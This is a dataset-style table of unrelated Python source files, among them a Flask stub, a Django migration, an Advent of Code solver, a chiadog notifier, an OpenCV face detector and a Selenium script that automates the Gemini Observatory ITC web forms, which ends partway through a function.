| max_stars_repo_path (string, 3–269 chars) | max_stars_repo_name (string, 4–119 chars) | max_stars_count (int64, 0–191k) | id (string, 1–7 chars) | content (string, 6–1.05M chars) | score (float64, 0.23–5.13) | int_score (int64, 0–5) |
|---|---|---|---|---|---|---|
flask01.py
|
pyporto/flask101
| 0
|
12777651
|
<gh_stars>0
from flask import Flask
app = Flask('myapp')
if __name__ == '__main__':
app.run()
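As written, flask01.py registers no routes, so every request returns 404. A minimal sketch of a single route, assuming it is declared before the __main__ block (the endpoint and message are illustrative, not part of the original file):

@app.route('/')
def index():
    # Hypothetical handler; the original sample defines no views.
    return 'Hello from myapp'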
| 1.335938
| 1
|
profiles/migrations/New folder/0035_auto_20201028_0913.py
|
Rxavio/link
| 0
|
12777652
|
# Generated by Django 3.0.3 on 2020-10-28 07:13
from django.db import migrations, models
import profiles.models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0034_auto_20201028_0358'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='image',
field=models.ImageField(default=profiles.models.default_image, upload_to=profiles.models.upload_images_path),
),
]
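The AlterField above references two callables from profiles/models.py that are not included in this row. A hedged sketch of what such helpers commonly look like (the names come from the migration, the bodies are hypothetical):

# profiles/models.py (hypothetical sketch)
def default_image():
    # Django accepts a callable for an ImageField default; returning a relative media path is typical.
    return 'defaults/profile.png'

def upload_images_path(instance, filename):
    # upload_to callables receive the model instance and the original filename.
    return f'profile_images/{instance.pk}/{filename}'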
| 1.484375
| 1
|
2018/day_4/star_1/star.py
|
j-benson/advent-of-code
| 0
|
12777653
|
from datetime import datetime, timedelta
def parse_line(line):
date = datetime.strptime(line[1:17], "%Y-%m-%d %H:%M")
message = line[19:]
return (date, message)
with open('data.txt') as data:
unordered_list = [parse_line(line) for line in data.readlines()]
ordered_list = sorted(unordered_list, key= lambda i : i[0])
guard_log = dict() # guard_id -> ( fell_asleep, woke_up, time_asleep )
guard = None
fell_asleep = None
## Parse the ordered guard sleep log
for log_entry in ordered_list:
timestamp = log_entry[0]
message = log_entry[1]
if message.startswith("Guard"):
guard = message[7:message.index(" ", 7)]
elif message.startswith("falls asleep"):
fell_asleep = timestamp
elif message.startswith("wakes up"):
if fell_asleep is None:
raise Exception("'wakes up' entry found without a preceding 'falls asleep' entry")
time_asleep = timestamp - fell_asleep
sleep_entry = (fell_asleep, timestamp, time_asleep)
if guard in guard_log:
guard_log[guard].append(sleep_entry)
else:
guard_log[guard] = [ sleep_entry ]
fell_asleep = None
## Create a tuple for sorting to find the guard that sleeps the most
total_sleep_time = []
for g_id in guard_log.keys():
total_time = sum([log_entry[2] for log_entry in guard_log[g_id]], timedelta())
total_sleep_time.append((g_id, total_time))
total_sleep_time.sort(reverse=True, key=lambda elem : elem[1])
sleepy_guard_id = total_sleep_time[0][0]
print(sleepy_guard_id)
## Find the sleepy guards most slept minute
sleep_log = guard_log[sleepy_guard_id]
sleep_minute_count = dict()
for i in range(0, 60):
sleep_minute_count[i] = 0
for log_entry in sleep_log: # ( fell_asleep, woke_up, time_asleep )
fell_asleep = log_entry[0]
time_asleep = log_entry[2]
start_sleep_minute = int(fell_asleep.minute)
end_sleep_minute = start_sleep_minute + int(time_asleep.total_seconds() / 60)
for minute in range(start_sleep_minute, end_sleep_minute):
sleep_minute_count[minute] += 1
sleep_minute_count = [(k, sleep_minute_count[k]) for k in sleep_minute_count.keys()]
sleep_minute_count.sort(reverse=True, key=lambda elem : elem[1])
sleepy_minute = sleep_minute_count[0][0]
print(sleepy_minute)
checksum = int(sleepy_guard_id) * sleepy_minute
print(checksum)
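The per-minute tally above can also be written with collections.Counter, which avoids pre-seeding every minute with zero. A sketch assuming the same guard_log structure built earlier:

from collections import Counter

minute_counter = Counter()
for fell_asleep, woke_up, time_asleep in guard_log[sleepy_guard_id]:
    start = fell_asleep.minute
    end = start + int(time_asleep.total_seconds() / 60)  # end minute is exclusive, as above
    minute_counter.update(range(start, end))
alt_sleepy_minute, _count = minute_counter.most_common(1)[0]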
| 3.1875
| 3
|
src/notifier/__init__.py
|
guydavis/chiadog
| 2
|
12777654
|
"""Notifier package responsible for user notification
"""
import json
import logging
import re
import time
import traceback
# std
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import List
from enum import Enum
# third-party
from json_logic import jsonLogic
# Ignore Chiadog offline alerts during the first 30 minutes after the container launches, since a gap in the logs is expected then
MINIMUM_LAUNCH_SECONDS_BEFORE_ALERTING_ABOUT_BEING_OFFLINE = 30 * 60
class EventPriority(Enum):
"""Event priority dictates how urgently
the user needs to be notified about it
"""
LOW = -1
NORMAL = 0
HIGH = 1
class EventType(Enum):
"""Events can either be user events
that are propagated directly to the
user, or keep-alive events that are
processed to ensure the system runs
"""
KEEPALIVE = 0
USER = 1
DAILY_STATS = 2
PLOTDECREASE = 3
PLOTINCREASE = 4
class EventService(Enum):
"""Even service helps to distinguish
between similar events for different services
"""
HARVESTER = 0
FARMER = 1
FULL_NODE = 2
DAILY = 3
WALLET = 4
@dataclass
class Event:
type: EventType
priority: EventPriority
service: EventService
message: str
class Notifier(ABC):
"""This abstract class provides common interface for
any notifier implementation. It should be easy to add
extensions that integrate with variety of services such as
Pushover, E-mail, Slack, WhatsApp, etc
"""
def __init__(self, title_prefix: str, config: dict):
self._program_launch_time = time.time()
self._title_prefix = title_prefix
self._config = config
self._conn_timeout_seconds = 10
self._notification_types = [EventType.USER]
self._notification_services = [EventService.HARVESTER, EventService.FARMER, EventService.FULL_NODE]
daily_stats = config.get("daily_stats", False)
wallet_events = config.get("wallet_events", False)
decreasing_plot_events = config.get("decreasing_plot_events", False)
increasing_plot_events = config.get("increasing_plot_events", False)
if daily_stats:
self._notification_types.append(EventType.DAILY_STATS)
self._notification_services.append(EventService.DAILY)
if wallet_events:
self._notification_services.append(EventService.WALLET)
if decreasing_plot_events:
self._notification_types.append(EventType.PLOTDECREASE)
if increasing_plot_events:
self._notification_types.append(EventType.PLOTINCREASE)
def get_title_for_event(self, event):
icon = ""
if event.priority == EventPriority.HIGH:
icon = "🚨"
elif event.priority == EventPriority.NORMAL:
icon = "⚠️"
elif event.priority == EventPriority.LOW:
icon = "ℹ️"
return f"{icon} {self._title_prefix} {event.service.name}"
def should_ignore_event(self, event):
# Automatically ignore Chiadog's spurious "Your harvester appears to be offline!" alerts immediately after a relaunch of the container
# Obviously if the Machinaris container (and thus all farming/harvesting) was just started, there will be a gap in the log...
if (self._program_launch_time + MINIMUM_LAUNCH_SECONDS_BEFORE_ALERTING_ABOUT_BEING_OFFLINE) >= time.time():
if (event.service.name == 'HARVESTER' and event.message.startswith("Your harvester appears to be offline!")) or \
(event.service.name == 'FULL_NODE' and event.message.startswith("Experiencing networking issues?")):
return True
# Next only ignore if user has set an "ignore" clause in config.xml for a particular Notifier
if not "ignore" in self._config:
return False
ignore = self._config["ignore"]
try:
# First check for one of type, priority, service, and message as a simple filter
if 'type' in ignore and ignore['type'] == event.type.name:
return True
if 'priority' in ignore and ignore['priority'] == event.priority.name:
return True
if 'service' in ignore and ignore['service'] == event.service.name:
return True
if 'message' in ignore and re.search(ignore['message'], event.message, re.M|re.I):
return True
# Then look for compound ignore clause to invoke json logic
if 'compound' in ignore:
rule = json.loads(ignore['compound'])
data = {
"type" : event.type.name.lower(),
"priority" : event.priority.name.lower(),
"service" : event.service.name.lower(),
"message" : event.message
}
logging.debug("Rule: {0}".format(json.loads(ignore['compound'])))
logging.debug("Data: {0}".format(data))
result = jsonLogic(rule, data)
logging.debug("Result: {0}".format(result))
return result
except Exception as ex:
logging.error("Ignore config '{0}' error {1}".format(ignore, str(ex)))
traceback.print_exc()
return False
@abstractmethod
def send_events_to_user(self, events: List[Event]) -> bool:
"""Implementation specific to the integration"""
pass
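The abstract base above leaves only send_events_to_user to implement. A minimal hypothetical subclass that just writes events to the log, rather than one of chiadog's real integrations:

class LogOnlyNotifier(Notifier):
    """Hypothetical notifier that logs events instead of calling an external service."""

    def send_events_to_user(self, events: List[Event]) -> bool:
        for event in events:
            if self.should_ignore_event(event):
                continue
            logging.info("%s: %s", self.get_title_for_event(event), event.message)
        return True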
| 2.734375
| 3
|
testHaarCascade.py
|
AriRodriguezCruz/mcfgpr
| 0
|
12777655
|
<reponame>AriRodriguezCruz/mcfgpr
# -*- coding: utf-8 -*-
"""
Basic test of our ability to do a Haar Cascade
"""
import cv2
haarFaceCascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_default.xml')
WINDOW_NAME = "preview"
def detect(img, cascade, minimumFeatureSize=(20,20)):
if cascade.empty():
raise Exception("There was a problem loading your Haar Cascade xml file.")
#cv2.CascadeClassifier.detectMultiScale(image, rejectLevels, levelWeights[, scaleFactor[, minNeighbors[, flags[, minSize[, maxSize[, outputRejectLevels]]]]]]) -> objects
rects = cascade.detectMultiScale(img, scaleFactor=1.2, minNeighbors=3, minSize=minimumFeatureSize)
if len(rects) == 0:
return []
rects[:,2:] += rects[:,:2] #convert last coord from (width,height) to (maxX, maxY)
return rects
def draw_rects(img, rects, color):
for x1, y1, x2, y2 in rects:
cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)
def handleFrame(frame, allowDebugDisplay=True):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.equalizeHist(gray)
faces = detect(gray,haarFaceCascade)
if allowDebugDisplay:
output = frame
draw_rects(output,faces,(0,255,0)) #BGR format
cv2.imshow(WINDOW_NAME, cv2.resize(output,(0,0), fx=2,fy=2,interpolation=cv2.INTER_NEAREST) )
def main():
previewWindow = cv2.namedWindow(WINDOW_NAME) # open a window to show debugging images
vc = cv2.VideoCapture(0) # Initialize the default camera
if vc.isOpened(): # try to get the first frame
(readSuccessful, frame) = vc.read()
else:
print "Could not open the system camera. Is another instance already running?"
readSuccessful = False
while readSuccessful:
handleFrame(frame, allowDebugDisplay=True)
key = cv2.waitKey(10)
if key == 27: # exit on ESC
# cv2.imwrite( "lastOutput.png", frame) #save the last-displayed image to file, for our report
break
# Get Image from camera
readSuccessful, frame = vc.read()
vc.release() #close the camera
cv2.destroyWindow(WINDOW_NAME) #close the window
if __name__ == "__main__":
main()
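The detect/draw_rects helpers also work on a still image instead of the live camera. A sketch assuming a local file named test.jpg (the filename is illustrative):

def detectInFile(path='test.jpg'):
    # Reuse the same pipeline on a single frame loaded from disk.
    img = cv2.imread(path)
    gray = cv2.equalizeHist(cv2.cvtColor(img, cv2.COLOR_BGR2GRAY))
    faces = detect(gray, haarFaceCascade)
    draw_rects(img, faces, (0, 255, 0))
    cv2.imwrite('test_out.png', img)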
| 2.5625
| 3
|
2-aiohttp/aiohttp_server/app/web/config.py
|
rcmgn/kts-school-backend
| 9
|
12777656
|
import typing
from dataclasses import dataclass
import yaml
if typing.TYPE_CHECKING:
from app.web.app import Application
@dataclass
class Config:
username: str
password: str
def setup_config(app: "Application"):
with open("config/config.yaml", "r") as f:
raw_config = yaml.safe_load(f)
app.config = Config(
username=raw_config["credentials"]["username"],
password=raw_config["credentials"]["password"],
)
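setup_config expects config/config.yaml to contain a credentials mapping with username and password keys. A hedged sketch that writes a matching file with placeholder values:

import yaml

example = {"credentials": {"username": "admin", "password": "change-me"}}
with open("config/config.yaml", "w") as f:
    # Produces exactly the two keys that setup_config reads.
    yaml.safe_dump(example, f)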
| 2.5625
| 3
|
ctre/trajectorypoint.py
|
Ninjakow/robotpy-ctre
| 0
|
12777657
|
# validated: 2018-03-01 DS b3d643236ddc libraries/driver/include/ctre/phoenix/Motion/TrajectoryPoint.h
from collections import namedtuple
__all__ = ["TrajectoryPoint"]
#: Motion Profile Trajectory Point for use with pushMotionProfileTrajectory
TrajectoryPoint = namedtuple(
"TrajectoryPoint",
[
"position",
"velocity",
"auxiliaryPos",
"profileSlotSelect0",
"profileSlotSelect1",
"isLastPoint",
"zeroPos",
"timeDur",
],
)
TrajectoryPoint.position.__doc__ = "The position to servo to."
TrajectoryPoint.velocity.__doc__ = "The velocity to feed-forward."
TrajectoryPoint.auxiliaryPos.__doc__ = "The position for auxiliary PID to target."
TrajectoryPoint.profileSlotSelect0.__doc__ = """
Which slot to get PIDF gains.
PID is used for position servo.
F is used as the Kv constant for velocity feed-forward.
Typically this is hardcoded to a particular slot, but you are free to
gain schedule if need be.
Choose from [0,3]
"""
TrajectoryPoint.profileSlotSelect1.__doc__ = """
Which slot to get PIDF gains for auxiliary PID.
This only has impact during MotionProfileArc Control mode.
Choose from [0,1]
"""
TrajectoryPoint.isLastPoint.__doc__ = """
Set to true to signal the Talon that this is the final point, so it does not
attempt to pop another trajectory point from the Talon buffer.
Instead it continues processing this waypoint. Typically the velocity
member variable should be zero so that the motor doesn't spin indefinitely.
"""
TrajectoryPoint.zeroPos.__doc__ = """
Set to true to signal Talon to zero the selected sensor.
When generating MPs, one simple method is to make the first target position zero,
and the final target position the target distance from the current position.
Then when you fire the MP, the current position gets set to zero.
If this is the intent, you can set zeroPos on the first trajectory point.
Otherwise you can leave this false for all points, and offset the positions
of all trajectory points so they are correct.
"""
TrajectoryPoint.timeDur.__doc__ = """
Duration to apply this trajectory pt.
This time unit is ADDED to the existing base time set by
configMotionProfileTrajectoryPeriod().
"""
| 2.671875
| 3
|
ITC_selenium.py
|
bryanmiller/pyitc_gemini
| 0
|
12777658
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
#import difflib
import datetime
import logging
import os
from selenium import webdriver
# from selenium.webdriver.firefox.options import Options
# from selenium import selenium
# from selenium.common.exceptions import TimeoutException
# from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
import sys
# import subprocess
import time
if sys.version_info.major == 2:
from urllib2 import urlopen
reload(sys)
sys.setdefaultencoding('utf8')
elif sys.version_info.major == 3:
from urllib.request import urlopen
# 2014 Mar 10 - Reorganize output, astephens
# 2014 Mar 12 - Ignore URLs (lines with "http") when performing diff
# 2014 Mar 14 - Add CompareDirs
# 2015 Feb 2 - AWS, ignore page-break lines between multiple plots
# 2021 Feb 12 - BWM, code cleanup
sleep = 0.1 # May need to increase on fast computers in headless mode
#---------------------------------------------------------------------------------------------------
def Usage():
print ('')
print ('SYNOPSIS')
cmd = sys.argv[0]
print (' ', cmd[cmd.rfind('/')+1:], 'test/production')
print ('')
print ('DESCRIPTION')
print (' Blah.')
print ('')
print ('OPTIONS')
#print (' -d : debug mode')
print ('')
# raise SystemExit
#---------------------------------------------------------------------------------------------------
def GetURL(Instrument, Testing, site='web'):
url = ''
if Testing:
url = 'http://itcdev.cl.gemini.edu:9080/itc/servlets/web/'
# url = 'http://sbfitcdev1.cl.gemini.edu:9080/itc/servlets/web/'
else:
if site in ['gn', 'gs']:
# Used by ODBs
url = 'http://' + site + 'odb.gemini.edu:8442/itc/servlets/web/'
elif site == 'web':
# Used by ITC web pages
url = 'https://www.gemini.edu/itc/servlets/web/'
else:
print('Site must be either "gn", "gs", or "web".')
return url
if Instrument == 'NIRI':
url += 'ITCniri.html'
elif Instrument == 'F2':
url += 'ITCflamingos2.html'
elif Instrument == 'GMOSN':
url += 'ITCgmos.html'
elif Instrument == 'GMOSS':
url += 'ITCgmosSouth.html'
elif Instrument == 'GNIRS':
url += 'ITCgnirs.html'
elif Instrument == 'NIFS':
url += 'ITCnifs.html'
elif Instrument == 'Michelle':
url += 'ITCmichelle.html'
elif Instrument == 'GSAOI':
url += 'ITCgsaoi.html'
elif Instrument == 'TReCS':
url += 'ITCtrecs.html'
return(url)
#---------------------------------------------------------------------------------------------------
# Get the output path
def GetPath(Instrument, Testing, outdir='/tmp/'):
# path = os.getenv('HOME') + '/tmp/' + Instrument + '/' + str(datetime.date.today())
path = os.getenv('HOME') + outdir
if Testing:
path += '/Test'
else:
path += '/Prod'
return(path)
#---------------------------------------------------------------------------------------------------
def SetLog(instrument, outdir='/tmp'):
path = os.environ['HOME'] + outdir + '/'
logfile = path + '/ITC_' + instrument + '.' + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S") + '.log'
logger = ConfigureLogging(logfile)
#logger = logging.getLogger()
logger.info('Log = %s', logfile)
return(logger)
#---------------------------------------------------------------------------------------------------
def ParseArgs(argv):
logger = logging.getLogger()
Testing = False
if len(argv) != 2:
Usage()
logger.info('Using default (Production URL...)')
else:
if 'test' in argv[1].lower():
Testing = True
logger.info('Using Test URL...')
elif 'prod' in argv[1].lower():
logger.info('Using Production URL...')
else:
Usage()
raise SystemExit
return(Testing)
#---------------------------------------------------------------------------------------------------
# Record the URL in the output directory for future reference
def RecordURL(URL, Instrument, Testing):
path = GetPath(Instrument, Testing)
if not os.path.exists(path):
os.mkdir(path)
URLFile = open(path + '/URL','w')
URLFile.write(URL + '\n')
URLFile.close()
#---------------------------------------------------------------------------------------------------
# Pass a URL that contains the ITC tests
def startWebpage(URL, headless=True):
# Create a new instance of the Firefox driver
# https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Headless_mode
options = webdriver.firefox.options.Options()
if headless:
options.add_argument('-headless')
driver = webdriver.Firefox(executable_path='geckodriver', options=options)
# go to the GMOS ITC Page
driver.get(URL)
return driver
#---------------------------------------------------------------------------------------------------
# Input: Brightness
# Units
def setPointSource(driver, Brightness, Units):
logger = logging.getLogger('setPointSource')
#Select Point Source
driver.find_element_by_xpath("//input[@name='Profile' and @value='POINT']").click()
#Set Point Source Brightness
if type(Brightness) is float:
Brightness = str(Brightness)
logger.debug('Setting Point Source brightness to %s', Brightness)
driver.find_element_by_name("psSourceNorm").clear()
driver.find_element_by_name("psSourceNorm").send_keys(Brightness)
#Set Point Source Units
driver.find_element_by_xpath("//select[@name='psSourceUnits']/option[@value='" + Units + "']").click()
#---------------------------------------------------------------------------------------------------
def setGaussianSource(driver, FullWidth, Brightness, Units):
logger = logging.getLogger('setGaussianSource')
# Turn Fullwidth to str
if type(FullWidth) is float:
FullWidth = str(FullWidth)
# Turn Brightness to str
if type(Brightness) is float:
Brightness = str(Brightness)
logger.debug('Setting Gaussian source with FWHM = %s and brightness = %s %s', FullWidth, Brightness, Units)
# Select Gaussian Source
driver.find_element_by_xpath("//input[@name='Profile' and @value='GAUSSIAN']").click()
# Set Full Width Half Max
driver.find_element_by_name("gaussFwhm").clear()
driver.find_element_by_name("gaussFwhm").send_keys(FullWidth)
# Set Brightness
driver.find_element_by_name("gaussSourceNorm").clear()
driver.find_element_by_name("gaussSourceNorm").send_keys(Brightness)
# Set Brightness Units
driver.find_element_by_xpath("//select[@name='gaussSourceUnits']/option[@value='" + Units + "']").click()
#---------------------------------------------------------------------------------------------------
def setUniformSource(driver, Brightness, Units):
logger = logging.getLogger('setUniformSource')
time.sleep(sleep)
if type(Brightness) is float:
Brightness = str(Brightness)
logger.debug('Setting uniform brightness to %s %s', Brightness, Units)
# Select Uniform Source
driver.find_element_by_xpath("//input[@name='Profile' and @value='UNIFORM']").click()
# Set Brightness
driver.find_element_by_name("usbSourceNorm").clear()
driver.find_element_by_name("usbSourceNorm").send_keys(Brightness)
# Set Brightness Units
driver.find_element_by_xpath("//select[@name='usbSourceUnits']/option[@value='" + Units + "']").click()
#---------------------------------------------------------------------------------------------------
def setBrightnessNormalization(driver, Wavelength):
driver.find_element_by_xpath("""//select[@name='WavebandDefinition']/option[@value=""" + '"' + Wavelength + '"' + """]""").click()
#---------------------------------------------------------------------------------------------------
def setLibrarySpectrum(driver, Type):
#Set for Library Spectrum of a star with specific stellar type
driver.find_element_by_xpath("//input[@value='LIBRARY_STAR' and @name='Distribution']").click()
#Choose stellar type
driver.find_element_by_xpath("//select[@name='stSpectrumType']/option[@value='" + Type + "']").click()
#---------------------------------------------------------------------------------------------------
def setLibrarySpectrumNonStellar(driver, Type):
#Set for Library Spectrum of a non-stellar object
driver.find_element_by_xpath("//input[@value='LIBRARY_NON_STAR' and @name='Distribution']").click()
#Choose non-stellar object
driver.find_element_by_xpath("//select[@name='nsSpectrumType']/option[@value='" + Type + "']").click()
#---------------------------------------------------------------------------------------------------
def setPowerLawSpectrum(driver, Index):
logger = logging.getLogger('setPowerLawSpectrum')
time.sleep(sleep)
if type(Index) is int or type(Index) is float:
Index = str(Index)
logger.debug('Setting power law index to %s', Index)
# Set for Power Law Spectrum
driver.find_element_by_xpath("//input[@value='PLAW' and @name='Distribution']").click()
# Set Index
driver.find_element_by_name("powerIndex").clear()
driver.find_element_by_name("powerIndex").send_keys(Index)
#---------------------------------------------------------------------------------------------------
def setBlackBodySpectrum(driver, Temperature):
logger = logging.getLogger('setBlackBodySpectrum')
time.sleep(sleep)
if type(Temperature) is int or type(Temperature) is float:
Temperature = str(Temperature)
logger.debug('Setting blackbody temperature to %s deg', Temperature)
# Set for BlackBody
driver.find_element_by_xpath("//input[@value='BBODY' and @name='Distribution']").click()
# Set Temperature
driver.find_element_by_name("BBTemp").clear()
driver.find_element_by_name("BBTemp").send_keys(Temperature)
#---------------------------------------------------------------------------------------------------
def setEmissionLine(driver, Wavelength, LineFlux, LineFluxUnits, LineWidth, FluxDensity, FluxDensityUnits):
logger = logging.getLogger('setEmissionLine')
time.sleep(sleep)
# Choose Emission Line
driver.find_element_by_xpath("//input[@value='ELINE' and @name='Distribution']").click()
# Set Wavelength
if type(Wavelength) is float:
Wavelength = str(Wavelength)
logger.debug('Setting emission line wavelength to %s um', Wavelength)
driver.find_element_by_name("lineWavelength").clear()
driver.find_element_by_name("lineWavelength").send_keys(Wavelength)
# Set Line Flux
if type(LineFlux) is float:
LineFlux = str(LineFlux)
logger.debug('Setting emission line flux to %s %s', LineFlux, LineFluxUnits)
driver.find_element_by_name("lineFlux").clear()
driver.find_element_by_name("lineFlux").send_keys(LineFlux)
# Set Line Flux Units
driver.find_element_by_xpath("//select[@name='lineFluxUnits']/option[@value='" + LineFluxUnits + "']")
# Set Line Width
if type(LineWidth) is float:
LineWidth = str(LineWidth)
logger.debug('Setting emission line width to %s', LineWidth)
driver.find_element_by_name("lineWidth").clear()
driver.find_element_by_name("lineWidth").send_keys(LineWidth)
# Set Flux Density
if type(FluxDensity) is float:
FluxDensity = str(FluxDensity)
logger.debug('Setting emission line flux density to %s %s', FluxDensity, FluxDensityUnits)
driver.find_element_by_name("lineContinuum").clear()
driver.find_element_by_name("lineContinuum").send_keys(FluxDensity)
# Set Flux Density Units
driver.find_element_by_xpath("//select[@name='lineContinuumUnits']/option[@value='" + FluxDensityUnits + "']")
#---------------------------------------------------------------------------------------------------
# This is for the OLD GMOS ITC with EEV, Hamamatsu Red and Blue CCDS
def setDetectorPropertiesGMOS(driver, CCD, SpatialBinning, SpectralBinning, Coating, Wavefront):
#Set CCD
if "eev" in CCD.lower():
#Set to EEV array
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "red" in CCD.lower():
#Set to Hamamatsu Red
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
else:
#Set to Hamamatsu Blue
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
#Set Spatial Binning
if type(SpatialBinning) is int:
SpatialBinning = str(SpatialBinning)
driver.find_element_by_xpath("//input[@name='spatBinning' and @value='" + SpatialBinning + "']").click()
#Set spectral Binning
if type(SpectralBinning) is int:
SpectralBinning = str(SpectralBinning)
driver.find_element_by_xpath("//input[@name='specBinning' and @value='" + SpectralBinning + "']") .click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# Set Detector Properties for GMOS-N
def setDetectorPropertiesGMOSN(driver, CCD, SpatialBinning, SpectralBinning, Coating, Wavefront):
# Set CCD
if "dd" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "leg" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "ham" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
# Set Spatial Binning
if type(SpatialBinning) is int:
SpatialBinning = str(SpatialBinning)
driver.find_element_by_xpath("//input[@name='spatBinning' and @value='" + SpatialBinning + "']").click()
# Set spectral Binning
if type(SpectralBinning) is int:
SpectralBinning = str(SpectralBinning)
driver.find_element_by_xpath("//input[@name='specBinning' and @value='" + SpectralBinning + "']") .click()
# Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
# Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# Set Detector Properties for GMOS-S
def setDetectorPropertiesGMOSS(driver, CCD, SpatialBinning, SpectralBinning, Coating, Wavefront):
# Set CCD
if "eev" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "ham" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
# Set Spatial Binning
if type(SpatialBinning) is int:
SpatialBinning = str(SpatialBinning)
driver.find_element_by_xpath("//input[@name='spatBinning' and @value='" + SpatialBinning + "']").click()
# Set spectral Binning
if type(SpectralBinning) is int:
SpectralBinning = str(SpectralBinning)
driver.find_element_by_xpath("//input[@name='specBinning' and @value='" + SpectralBinning + "']") .click()
# Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
# Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-05
def setDetectorPropertiesGSAOI(driver, Noise, Coating, Strehl, StrehlBand):
logger = logging.getLogger('setDetectorPropertiesGSAOI')
# Set Read Noise Level
if "veryfaint" in Noise.lower():
driver.find_element_by_xpath("//input[@value='VERY_FAINT' and @name='ReadMode']").click()
elif "faint" in Noise.lower():
driver.find_element_by_xpath("//input[@value='FAINT' and @name='ReadMode']").click()
else:
driver.find_element_by_xpath("//input[@value='BRIGHT' and @name='ReadMode']").click()
# Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
# Set Strehl
# if type(Strehl) is int or type(Strehl) is float:
# Strehl = str(Strehl)
#
# logger.debug('Setting Strehl to %s', Strehl)
# driver.find_element_by_name("avgStrehl").clear()
# driver.find_element_by_name("avgStrehl").send_keys(Strehl)
#
# # Set Strehl Band
# driver.find_element_by_xpath("//select[@name='strehlBand']/option[@value='" + StrehlBand + "']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-10
def setDetectorPropertiesF2(driver, Noise, Coating, Port, Wavefront):
#Set Read Noise Level
if "low" in Noise.lower():
driver.find_element_by_xpath("//input[@value='FAINT_OBJECT_SPEC' and @name='ReadMode']").click()
elif "med" in Noise.lower():
driver.find_element_by_xpath("//input[@value='MEDIUM_OBJECT_SPEC' and @name='ReadMode']").click()
else:
driver.find_element_by_xpath("//input[@value='BRIGHT_OBJECT_SPEC' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Port
if "side" in Port.lower():
driver.find_element_by_xpath("//input[@value='SIDE_LOOKING' and @name='IssPort']").click()
elif "up" in Port.lower():
driver.find_element_by_xpath("//input[@value='UP_LOOKING' and @name='IssPort']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setDetectorPropertiesNIRI(driver, Bias, Noise, Coating, Wavefront):
#Set Detector Bias
if "low" in Bias.lower():
driver.find_element_by_xpath("//input[@value='SHALLOW' and @name='WellDepth']").click()
else:
driver.find_element_by_xpath("//input[@value='DEEP' and @name='WellDepth']").click()
#Set Read Noise Level
if "low" in Bias.lower():
driver.find_element_by_xpath("//input[@value='IMAG_SPEC_NB' and @name='ReadMode']").click()
elif "med" in Bias.lower():
driver.find_element_by_xpath("//input[@value='IMAG_1TO25' and @name='ReadMode']").click()
else:
driver.find_element_by_xpath("//input[@value='IMAG_SPEC_3TO5' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
